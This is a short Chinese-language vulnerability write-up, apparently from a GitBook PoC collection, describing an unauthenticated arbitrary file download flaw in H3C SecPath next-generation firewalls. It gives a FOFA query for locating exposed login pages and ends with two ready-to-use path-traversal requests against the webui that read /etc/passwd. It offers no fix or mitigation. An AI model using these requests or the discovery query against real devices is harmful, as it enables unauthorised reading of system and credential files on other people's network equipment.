# H3C SecPath 下一代防火墙 任意文件下载漏洞

### 漏洞描述 <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

H3C SecPath 下一代防火墙 存在功能点导致任意文件下载漏洞，攻击者通过漏洞可以获取敏感信息

### 漏洞影响 <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

&#x20;Note

H3C SecPath

### FOFA <a href="#fofa" id="fofa"></a>

&#x20;Note

title="Web user login"

### 漏洞复现 <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

登录页面如下

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-MhqyJJ9XxS7ijApYFN8%2F-Mhr--nRfhXd-5OPHtqJ%2Fimage.png?alt=media\&token=11e95bce-95c6-4161-9692-02699b112858)

存在漏洞点的功能有两个

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-MhqyJJ9XxS7ijApYFN8%2F-Mhr-2TjYQvumNWtr_38%2Fimage.png?alt=media\&token=e1f3f98f-85cd-4747-8b08-6d0defa608f5)

点击下载抓包更改请求

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-MhqyJJ9XxS7ijApYFN8%2F-Mhr-5Y8-tORwhAmjz1k%2Fimage.png?alt=media\&token=8e3b164f-3886-416d-b6a3-15e811365594)

并且在未身份验证的情况中，也可以请求下载敏感文件

验证POC

```
/webui/?g=sys_dia_data_check&file_name=../../etc/passwd

/webui/?
g=sys_capture_file_download&name=../../../../../../../../etc/passwd
```

​